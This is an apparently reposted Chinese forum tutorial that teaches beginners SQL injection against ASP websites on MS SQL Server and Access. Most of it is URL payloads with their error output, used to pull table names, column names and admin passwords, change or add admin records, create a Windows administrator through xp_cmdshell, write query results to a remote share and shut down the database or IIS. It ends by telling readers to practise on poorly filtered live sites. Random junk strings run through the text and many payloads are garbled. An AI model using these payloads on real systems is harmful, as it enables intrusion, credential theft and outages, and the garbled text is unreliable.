[安全]菜鸟SQL注入详解

踏浪行歌

菜鸟SQL注入详解 , T1 V$ G3 z3 {% _ 网上有很多高手GG们写的利用SQL注入如何去黑网站的，偶看了，嘿嘿。 : _& K! U5 e9 ?& g7 O5 T$ U不过可能对于一些初学者而且，有点难。在这里，小林想把这个过时的 东东作一次全面的交待，尽量让没有编程基础的DDMM们很快的拿握这门技术。 $ M' ?: \# \* T利用SQL进行添加，更改，查看记录。

当一台主机台开了80端口，当你手头没有任何黑客工具，那么，偶们有SQL。 2 s+ u6 }& @/ Y, I% a/ I/ I他不需要你其他东东，只要一个浏览器就够了。HOHO，偶的文章菜菜，偶写这 * I! O" p$ ~% {* N& F* _; c篇文章只是为了让一些对SQL很陌生的菜菜们看的，老鸟绕道。。。 ( v7 u* g1 |! p% p: E% E

1，什么是SQL注入？ 3 D! E" b+ ^4 i! i3 S

SQL注入，就是利用欺骗的方式，通过网页的查询功能，或查询命令注入。 当用户来到网站，会提交一些数据，再到数据库进行查询，确定此用户的身份。 举个简单的例子来说吧，你去一个站点的论坛，那么，你会输入你的用户名和 密码，点“确定”，网站会通过数据库的查询来判断你是不是他们的用户， 1 B, t( H9 M4 z; W你的用户名和密码是否正确。而利用SQL注入，通过构造特殊的语句，来查找我 0 V( t6 b t1 G( m3 X) b0 a9 \们所想要得到的信息，如管理员的帐号密码。以下，小林用了http://xxx.xxx.com 5 E1 e0 J% i( r' E; j+ s来表示一个存在注入漏洞的网页。 * F* s' K9 q2 h( ?

' {2 a: ], v3 w+ }) `- ]9 _2，助手篇， 先把IE菜单-工具-Internet选项-高级-显示友好HTTP错误信息前面的勾去掉。 ' H- M$ d6 s4 Q r# h& M( g/ a否则，不论服务器返回什么错误，我们都只能看到“HTTP500服务器错误”，不能获得更多的提示信息 9 p5 F+ C( R# k: T

。 - T+ ~2 e3 n9 z9 x4 t8 ^8 x

3，哪些网页能利用？ ( E9 V9 C: O* V' [) D6 L: O+ r+ |8 C我们去找一些要提交数据的网页，如：登陆页面，查找页面，添加页面等 . B m, [8 g! h5 w5 a5 q7 U! q找到后，如果你注意过网页的源代码，那么，你会发现，他上面一般有一个如下的表单：

<FORMaction=login.aspmethod=post> <input........ </FORM> V" i; J: w3 @5 }- ?- O

这些网页，后缀如asp,jsp,cgi，php网页。 2 ~. N1 Q2 `; l2 F2 y0 n+ a t( g I如：http://xxx.xxx.com/index.asp?id=10 ; x% I$ A; x* M5 V4 J上面这个例子，就是ASP页后，看到他的ID还的值了吗？是10。一般，我们找的就是这些页面 来练手了。（要做个好人噢。（^_^）像小林一样的好人。）

4，怎么测试它是存在注入漏洞的呢？这一步偶称它为“踩点”。 ( O4 M+ Q' `0 G* H, E% A小林有一个毛病，看什么网页，就要顺手在参数（如上面的10）上加一个小小的引号。 ' z [; i" R; hhttp://xxx.xxx.com/index.asp?id=10 ! V u! B4 p6 }6 ?% P% t5 s返回错误信息：

MicrosoftOLEDBProviderforSQLServer错误80040e14

字符串之前有未闭合的引号。 , T/ r1 U8 ?% @6 |

/job/grxx.asp，行141 ' X2 M5 a3 C% ^' X/ J1 P# O/ @( g" w

这就是说，他用的是MsSQL数据库。这个引号，导致引号未闭合的错误。本身就是错的，因为 通常一个整数是不用在SQL里加引号的。

如果他不是一个整数而是字母呢？

http://xxx.xxx.com/index.asp?user=lamb

那我们就把引号放到lamb中间，如lamb / x- V: A9 S2 n+ J" g! n! o! t, w呵呵，又出错了吧？ 6 {( C% ?/ c! D4 C, q0 |8 |6 W

这说明，站点这一部分的代码是大有问题的（当然，就算他有源码公布在网上，我也懒得看） $ }. w3 B7 J- [' x! S1 |" u& R

当然，我们也可以提交： http://xxx.xxx.com/index.asp?id=10;ANDcolumnaaa=5(注，这里的columnaaa是我乱写的) 出现错误信息： 9 i/ |4 T7 |' T$ D

MicrosoftOLEDBProviderforODBCDrivers错误80040e14

[Microsoft][ODBCSQLServerDriver][SQLServer]Invalidcolumnnamecolumnaaa.

/job/grxx.asp，行27 + M6 k# f6 m; b$ u' u0 J" c8 w这说明，这是一个SQL，里面没有columnaaa这个字段（我习惯说“列”）。

利用出错的信息，我们现在多少了解了这个站点的服务了吧？ 9 Q. j# r* Q8 W' F

5，现在开工啦，偶不喜欢猜测他的字段名，太浪费TIME了，我们要想办法让数据查询中出错。 要产生一个错误让它自己报出数据库里的值。让我们用一用SQL语法GROUPBY或HAVING。如：

http://xxx.xxx.com/job/grxx.asp?id=23%20HAVING%201=1-- 9 ?" p3 U3 n: l8 \3 b' F0 T3 N, A

出现错误信息： 2 s3 f' S6 j# N: M; ]2 ~3 SMicrosoftOLEDBProviderforODBCDrivers错误80040e14 # D" L, U7 D( Q3 a, L/ I+ X& {

[Microsoft][ODBCSQLServerDriver][SQLServer]Columnarticle.newsidisinvalidinthe ! M6 r) ^- i0 C% m% N

selectlistbecauseitisnotcontainedinanaggregatefunctionandthereisnoGROUPBY

clause. 9 O$ O9 g6 e6 K4 M7 g; d. w6 ]

/more.asp，行27 " f( `0 A3 o+ g. f& [8 M ^

看到article.newsid了吗？说明有一个叫article.newsid的列，因为你在用HAVING，所以你必须还要用 - |( R* h1 Y- |" l M5 N

上GROUPBY，于是黑客就重复错误提交，直到没有得到错误。 这里要说明一下：分号在这里分离，%20是空格，--表示后面是一个注释，也就是说只是说明，不能去 - w" |4 H4 s0 s

执行代码。(*_*)

下面是具体例子： 7 c( {0 r1 U7 @' e% c

提交： ! o8 b& V0 R: ]: T4 |: ~ R7 Xhttp://xxx.xxx.com/job/grxx.asp?id=23%20HAVING%201=1-- 得到article.newsid这真是好东西。 提交： http://xxx.xxx.com/job/grxx.asp?id=23%20group%20by%20article.newsid%20having%201=1-- ; r& }* f4 x# C# S得到错误信息： MicrosoftOLEDBProviderforODBCDrivers(0x80040E14) 4 [" @) \% H, Z/ G1 J/ C. u

[Microsoft][ODBCSQLServerDriver][SQLServer]Columnarticle.titleisinvalidinthe

selectlistbecauseitisnotcontainedineitheranaggregatefunctionortheGROUPBY % c( g$ y/ c& H O3 o

clause. 6 { a) @# b# P- ~3 B

/more.asp，line20 x2 Y/ F. G# \5 {( }" }- m

得到： ( O6 h8 _1 j. Aarticle.title ; T7 ]! Z* K ^/ A9 p我们反复地一个一个加上来提交。 得到错误信息： MicrosoftOLEDBProviderforODBCDrivers(0x80040E14) 7 F: O5 Y% {7 c. Z

[Microsoft][ODBCSQLServerDriver][SQLServer]Columnadm.userNameisinvalidinthe

selectlistbecauseitisnotcontainedineitheranaggregatefunctionortheGROUPBY

clause.

/more.asp，line56 ) _% O& S# ^4 p8 K

这里要注意了，都到哪儿了？到下一个表了。 现在我们知道这里至少有2个表，他们的别名是：adm和article，如里面article对应的是：newsid等 ! c. o% X8 c8 [$ e9 k/ X) W0 S

title . |, k9 Q" A- v. y

利用系统表：

下面，我们要确定表名来加入数据。 6 z. _5 a+ @: y1 {# L系统表是MS-SQL2000的一部分，名叫sysObjectstable，我们将要用到查询UNIONSELECT,。 3 z0 W! m" L C) L4 C7 p8 ?: k要从SysObjectstable有天地拿到表名，一般使用下面语句： SELECTnameFROMsysObjectsWHERExtype=UU是指明定议USER的表。 ; J! Z( b: ~6 `9 k6 O$ I5 V黑客们已经知道了表里的列， 现在他们能在下面加一些数字。甚至如下面的： # @; V8 b5 k3 t1 a! d3 }$ N% h

在地址栏里打入：

http://xxx.xxx.com/job/grxx.asp?id=23%20UNION%20ALL%20SELECT%; ; g5 |, T& x! ?0 \. w201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype=U-- . {, F; W7 w$ z8 ^* H1 S- }记住，上面的，1-6数据中，6是我们想要的。不过有时候会出现数据类型错误，

http://xxx.xxx.com/job/grxx.asp?id=23%20SELECT;TOP1TABLE_NAMEFROM 6 u/ L. l( V- r. R

INFORMATION_SCHEMA.TABLES--

MSSQL服务将试图去转换一个string(nvarchar)到integer。那么就会出错： " w% E. {; M D' m' r0 z

MicrosoftOLEDBProviderforODBCDriverserror80040e07 [Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue

table1toacolumnofdatatypeint. /index.asp,line5

这个错误信息很“友好”地告诉我们string(nvarchar)值不能被转换成integer。 这样，我们就获得了数据表的第一个表名！这个表名就是tabel1。

2 { u4 }; g* ]0 D4 w0 ^2 Y要获得第二个表名，我们继续，用以下查询： % L. R8 @5 i! \7 D* | g% _0 Shttp://xxx.xxx.com/job/grxx.asp?id=23%20UNION;SELECTTOP1TABLE_NAMEFROM 2 ^+ g' I! L9 J5 y8 {& _- j

INFORMATION_SCHEMA.TABLESWHERETABLE_NAMENOTIN(table1)--

也可以用关键字查找数据： http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1TABLE_NAMEFROM ( `* e, J, N- Y2 e8 e/ p

INFORMATION_SCHEMA.TABLESWHERETABLE_NAMELIKE%25ADMIN%25-- / c/ }8 R2 }1 \ f- A现在错误信息： MicrosoftOLEDBProviderforODBCDriverserror80040e07 [Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue + F" `' A2 ~4 B+ @

admin_logintoacolumnofdatatypeint. 1 a/ ^+ g+ Y% S \2 x* ]! u/index.asp,line5

寻找与之匹配的值，%25ADMIN%25在SQL服务器上将被认作%ADMIN%。这样，我们就能获得符合标 " Q. [8 g) ]5 @准的表名为"admin_login"的表了。

那么，如何获得表里所有的列表？ 4 m5 l8 J# k8 Y9 E; y

我们能利用另一个有用的东东，INFORMATION_SCHEMA.COLUMNS出场！！！ 7 n3 W& V& ~5 _8 l7 W6 c+ x+ }http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1COLUMN_NAMEFROM

INFORMATION_SCHEMA.COLUMNSWHERETABLE_NAME=admin_login-- / m3 |, U% s- i$ n

现在错误信息： N K( Y5 X9 i7 T1 b; l% yMicrosoftOLEDBProviderforODBCDriverserror80040e07 * p. d, d/ V$ V) e+ }( N# ^# [; J1 n! L" q[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue

u_idtoacolumnofdatatypeint. /index.asp,line6 + q, R* z2 W7 l# l看，我们有了第一个字段的名，我们用NOTIN()来获得下一个字段名： & F4 T7 J6 A3 V0 L( e+ d# Xhttp://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1COLUMN_NAMEFROM ! h' W7 _' r- V& f* t

INFORMATION_SCHEMA.COLUMNSWHERETABLE_NAME=admin_loginWHERECOLUMN_NAMENOTIN

(u_id)-- & h( f5 O7 L- R7 p$ m M现在错误信息： ! n; \4 O3 S* v8 c% WMicrosoftOLEDBProviderforODBCDriverserror80040e07 [Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue " v( k" ^6 I4 x `( ~% ?4 D5 |

u_nametoacolumnofdatatypeint. 1 ]' V5 R( S* e, x1 L0 t/index.asp,line5 ( G$ T& S" w. g7 w8 u( @) i; Z; m/ k我们继续，获得其他列表。如："password"等，因为我们获得下面错误信息： http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1COLUMN_NAMEFROM ; S( e e* L9 z( c

INFORMATION_SCHEMA.COLUMNSWHERETABLE_NAME=admin_loginWHERECOLUMN_NAMENOTIN " M" G9 e. a: L( B7 x2 O) a

(u_id,u_name,password,contents)-- 现在错误信息： MicrosoftOLEDBProviderforODBCDriverserror80040e14 [Microsoft][ODBCSQLServerDriver][SQLServer]ORDERBYitemsmustappearintheselect

listifthestatementcontainsaUNIONoperator. /index.asp,line5 6。2如何找到我们要找的重要数据呢？ 现在我们知道了表名，字段名，我们用相同的方法收集我们要的在数据库里的信息。 7 b( w d s4 b1 J* f9 n现在，我们从"admin_login"表里取得第一个u_name： ( o/ T m8 h: r1 o' S6 H3 zhttp://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1u_nameFROMadmin_login-- 现在错误信息： MicrosoftOLEDBProviderforODBCDriverserror80040e07 [Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue

adminroottoacolumnofdatatypeint. + R& n5 r& B. k" h/index.asp,line5

# @2 V) \( o: F4 u* \1 h" P我们知道，这里有登陆的用户名叫"adminroot"的管理员。最后，从数据库里获得"adminroot"的密码

： 0 Z+ u: O" g- [: ]# }http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1passwordFROMadmin_loginwhere ' {, g w- J8 F6 e

u_name=adminroot-- 现在错误信息： MicrosoftOLEDBProviderforODBCDriverserror80040e07 . }/ u: e* h# F! ~7 }[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue

roottoacolumnofdatatypeint. % _6 [% d1 p, S" `+ a$ F! x+ @/index.asp,line5 ; @$ Z! q% {1 X7 V# g5 F2 H6 T' |我们现在能用户名"adminroot"密码："root"登陆了。

如何取得数字的值？ - I2 p0 P/ m% n2 h8 q# v; e

以上技术描述有有一定的局限性。当我们试图转换文本组成有效的数字0-9我们不能得到任何错误。 1 i0 N' u2 m Y让我们说说如何获得"tony"的密码，密码是"19840217": http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1passwordFROMadmin_loginwhere ) [ C- u8 F( l6 V# @$ o

u_name=tony-- / E0 n4 k' x5 y6 c我们很可能发现，该页无法显示的错误。这结果表示，密码"19840217"被修改到一个数了。在整 ' i5 j7 E# m$ M7 j: v8 {合一个整型(10也是)，因为这是一个有效的整合。所以SQL服务就不会给出错误的提示了。 $ j8 ?7 Q% V# J u7 k3 N我们就得不到数字的登陆了。 要解决这个问题，我们能附加一些字母来测试转换失败。我们用以下的测试来代替： % R7 f9 W# C; s4 Z+ P* C( M3 ohttp://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1convert(int, * o; ^0 v( j8 a0 [

password%2b%20lambgirl)FROMadmin_loginwhereu_name=tony--

我们简单地利用加号+设置密码数据文件的搜索路径。随便加一些。ASSCII码+=0x2b 我们将添加空格在密码里。所以，如果把我们的密码是19840217。他将变成19840217lambgirl. 5 J$ S7 C, p) w调出了转换了的函数。试着将19840217lambgirl转变成整型。SQL服务将出现ODBC错误： MicrosoftOLEDBProviderforODBCDriverserror80040e07 [Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue # Q% \6 u7 k5 g7 ~) \

19840217lambgirltoacolumnofdatatypeint. /index.asp,line5 + F" L! P. ~7 m5 |$ p$ \2 f; |现在，你就能用tony和密码：19840217lambgirl了。 % r$ ~. O6 L' L& R3 L

如何在数据库修改，插入数据？ 当我们成功地获得了表名，字段。就很容易在数据库里修改甚至插入新的数据。如更改"adminroot" % E/ z. Z$ m$ R; j9 V的密码，我们

http://xxx.xxx.com/job/grxx.asp?id=23;UPDATEadmin_loginSETpassword=newpas5WHERE

u_name=adminroot-- , X3 m# `" w* Y/ W% U$ I

要在数据表里插入新记录，

http://xxx.xxx.com/job/grxx.asp?id=23;INSERTINTOadmin_login(u_id,u_name, # C7 I( l0 Y3 c5 u+ ~3 w2 B

password,contents)VALUES(123,xiaolin,pas,lambgirl)-- 8 O5 j# K5 b6 R" l& n8 u: y7 N现在，我们就能用xiaolinpas来登陆了。

如何远程执行SQL漏洞？ ' m* [ ^' m# O3 b9 s4 q+ V C

能进行SQL注入命令表明，我们能查任何我们想要查的。默认安装的的MSSQL服务 - Z) x5 A. i6 R6 v3 O" m H2 u在系统中权限等于管理员。我们能利用执行存储过程像xp_cmdshell来执行远程破坏： 3 |1 J8 a h7 Z& D;execmaster..xp_cmdshellping192.168.0.2-- 5 G/ n- G2 [- l# F

(如果单引号不能用，就换成双引号)

分号表示结束前面的SQL查询，从而允许你开始另一个新的SQL命令。 1 e5 ^1 V% B6 |; F9 t3 ^! m为了检验命令成功执行，你可以监听从192.168.0.2发出的的ICMP包。查看是否发出包。 3 Q) s! q, {+ e8 d: o

#tcpdumpicmp ! _: u* E2 ~2 u6 k2 O! f. A如果你没有接到PING主机的回应，得到一个错误的提示，权限错误，那么，很可能管理员 限制了WEB用户对xp_cmdshell等的权限。 9 w+ g- y1 O/ H

如何找出MYSQL查询结果？ 这很容易用sp_makewebtask来把你查询的结果放到一个HTML里： 2 _$ H, F, B8 Y; |' k$ j;EXECmaster..sp_makewebtask"\\192.168.0.2\share\girlxiaolin.html","SELECT*FROM , B5 _3 h+ u) U# m* ]: X, w1 K

INFORMATION_SCHEMA.TABLES" . I/ i3 g! q" j8 ^# A1 L6 j但是目标IP必须共享文件夹。 ) P: n' H- M& u

http://xxx.xxx.com/job/grxx.asp?id=23;;execmaster..xp_cmdshell“netusername password/add”--

xp_cmdshell用于调用系统命令，于是，用net命令新建了用户名为name、密码为password : E# X( W+ ^8 D/ P- l& z' a) d+ W$ j的windows的帐号，接着： ( k& U" Q: b" ahttp://xxx.xxx.com/job/grxx.asp?id=23;;execmaster..xp_cmdshell“netlocalgroupname ! K- V' }. B# x! R

administrators/add”-- 将新建的帐号name加入管理员组，不过这种方法只于用sa连接数据库的情况，否则，没有权限调用

xp_cmdshell。

其他方面，如利用SQL的命令填写： $ v6 f2 f, X1 V* U3 f, ]将使SQL服务快速关闭 * F' {5 r9 D9 B9 @用户名:;shutdownwithnowait;-- 密码:不填

导致严重问题，网络故障。 用户名:;execmaster..xp_cmdshelliisreset;-- * S* f. T+ ?3 `. I9 Y密码：不填 " l9 a/ o+ T. k) b0 Z R6 V% @" d

关于ACCESS部分，

和ASSQL差不了多少，也是先在http://xxx.xxx.com/index.asp?id=10

出错的话，继续提交： 先测试是否有ADMIN表， # Z) F. K) |% ^( s$ Ehttp://xxx.xxx.com/index.asp?id=10and0<>(selectcount(*)fromadmin)

http://xxx.xxx.com/index.asp?id=10and1=(selectcount(*)fromadmin) ' ~+ e; z9 B' v1 U" }7 }. v没有的话，就换一个名字，如user啊，什么的。再猜里面是否有username这个字段.

and1=(selectcount(*)fromadminwherelen(username)>0) , X% D" U* ~& p7 C& M& b1 [如果出错，同理，我们也可以给它换一个名字。 4 P5 A* ]1 W: p, J接下来我们猜用户的具体名字。 . ^* W/ I) N5 A+ l1 iand1=(selectcount(*)fromadminwhereleft(username,1)=l) \0 Z: O5 E8 p( f" b& f9 O+ I( b这时我们可以一个一个地来猜。 and1=(selectcount(*)fromadminwhereleft(username,2)=la) 接下来猜密码，猜密码的道理同猜用户名一样。 and1=(selectcount(*)fromadminwhereleft(password,1)=l)

好了，不写了，这篇文章小林写了好几天了，累死了，还是条理不清楚。 & n3 z8 {* _' q' `- k; S' q文章还有很多不全面的地方。还有一些专业术语，小林可能也有误，不过小菜们拿来看看还 0 S3 [3 D! b" M是行的啦。如果哪些写错了，请老鸟们加偶：165442496，告诉我错误，我会修正的。 % f; |0 A% i+ ?# b% z, j我试过了，很多用MsSQL站点过滤不完整的网上也很多。所以大家可以找来练练手。

[em09]